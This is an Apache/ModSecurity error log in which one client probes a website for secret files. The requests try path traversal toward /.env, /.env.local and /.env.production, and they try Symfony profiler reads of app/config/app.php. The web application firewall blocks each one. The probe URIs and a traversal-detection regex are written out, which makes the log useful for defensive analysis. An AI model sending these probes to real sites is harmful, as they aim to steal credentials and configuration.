[Tue May 12 04:39:45.004422 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS8Xo6NvB9WXx5V-6fBAAAAQw"]
[Tue May 12 04:39:45.004500 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS8Xo6NvB9WXx5V-6fBAAAAQw"]
[Tue May 12 04:39:45.004668 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS8Xo6NvB9WXx5V-6fBAAAAQw"]
[Tue May 12 04:39:45.456526 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8Xo6NvB9WXx5V-6fBAAAAQw"]
[Tue May 12 04:39:45.482378 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS8c1tk6y7yBJLpJop-wAAAII"], referer: https://tchatbooster.com/js../../.env
[Tue May 12 04:39:45.482592 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS8c1tk6y7yBJLpJop-wAAAII"], referer: https://tchatbooster.com/js../../.env
[Tue May 12 04:39:45.984183 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8c1tk6y7yBJLpJop-wAAAII"], referer: https://tchatbooster.com/js../../.env
[Tue May 12 04:39:46.006547 2026] [core:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 04:39:46.503333 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS8jue9Sp-pIv_Bb61kgAAAUQ"], referer: https://tchatbooster.com/js../../../.env
[Tue May 12 04:39:46.503551 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS8jue9Sp-pIv_Bb61kgAAAUQ"], referer: https://tchatbooster.com/js../../../.env
[Tue May 12 04:39:46.585390 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS8no6NvB9WXx5V-6fBwAAAQw"]
[Tue May 12 04:39:46.585806 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS8no6NvB9WXx5V-6fBwAAAQw"]
[Tue May 12 04:39:46.996234 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8jue9Sp-pIv_Bb61kgAAAUQ"], referer: https://tchatbooster.com/js../../../.env
[Tue May 12 04:39:47.043328 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8no6NvB9WXx5V-6fBwAAAQw"]
[Tue May 12 04:39:47.061369 2026] [core:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 04:39:47.061850 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS8zue9Sp-pIv_Bb61kwAAAUQ"], referer: https://tchatbooster.com/_profiler/open?file=app/config/app.php
[Tue May 12 04:39:47.062318 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS8zue9Sp-pIv_Bb61kwAAAUQ"], referer: https://tchatbooster.com/_profiler/open?file=app/config/app.php
[Tue May 12 04:39:47.554555 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8zue9Sp-pIv_Bb61kwAAAUQ"], referer: https://tchatbooster.com/_profiler/open?file=app/config/app.php
[Tue May 12 04:39:47.582852 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS8zue9Sp-pIv_Bb61lAAAAUQ"], referer: https://tchatbooster.com/js../../../../.env
[Tue May 12 04:39:47.583091 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS8zue9Sp-pIv_Bb61lAAAAUQ"], referer: https://tchatbooster.com/js../../../../.env
[Tue May 12 04:39:47.656284 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS8zue9Sp-pIv_Bb61lQAAAVQ"]
[Tue May 12 04:39:47.656706 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS8zue9Sp-pIv_Bb61lQAAAVQ"]
[Tue May 12 04:39:48.072211 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8zue9Sp-pIv_Bb61lAAAAUQ"], referer: https://tchatbooster.com/js../../../../.env
[Tue May 12 04:39:48.109068 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS8zue9Sp-pIv_Bb61lQAAAVQ"]
[Tue May 12 04:39:48.127286 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS9Due9Sp-pIv_Bb61lwAAAVQ"]
[Tue May 12 04:39:48.127354 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS9Due9Sp-pIv_Bb61lwAAAVQ"]
[Tue May 12 04:39:48.127521 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS9Due9Sp-pIv_Bb61lwAAAVQ"]
[Tue May 12 04:39:48.127659 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS9Due9Sp-pIv_Bb61lgAAAUQ"], referer: https://tchatbooster.com/_profiler/open?file=app/config/app.php
[Tue May 12 04:39:48.130338 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_profiler/open"] [unique_id "agKS9Due9Sp-pIv_Bb61lgAAAUQ"], referer: https://tchatbooster.com/_profiler/open?file=app/config/app.php
[Tue May 12 04:39:48.576363 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9Due9Sp-pIv_Bb61lwAAAVQ"]
[Tue May 12 04:39:48.594698 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS9AgpmE1yW0glLdgfYgAAANY"], referer: https://tchatbooster.com/js../../.env.local
[Tue May 12 04:39:48.594936 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS9AgpmE1yW0glLdgfYgAAANY"], referer: https://tchatbooster.com/js../../.env.local
[Tue May 12 04:39:48.618548 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9Due9Sp-pIv_Bb61lgAAAUQ"], referer: https://tchatbooster.com/_profiler/open?file=app/config/app.php
[Tue May 12 04:39:49.038146 2026] [authz_core:error] [pid 1825179:tid 1825200] [client 176.120.22.46:65295] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-patterns/error_log, referer: https://www.maelbailly.fr/wp-includes/block-patterns/
[Tue May 12 04:39:49.086037 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9AgpmE1yW0glLdgfYgAAANY"], referer: https://tchatbooster.com/js../../.env.local
[Tue May 12 04:39:49.121068 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS9Tue9Sp-pIv_Bb61mgAAAVQ"]
[Tue May 12 04:39:49.121150 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS9Tue9Sp-pIv_Bb61mgAAAVQ"]
[Tue May 12 04:39:49.121302 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS9Tue9Sp-pIv_Bb61mgAAAVQ"]
[Tue May 12 04:39:49.567563 2026] [security2:error] [pid 1730207:tid 1730229] [client 45.148.10.166:2352] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS9Tue9Sp-pIv_Bb61mgAAAVQ"]
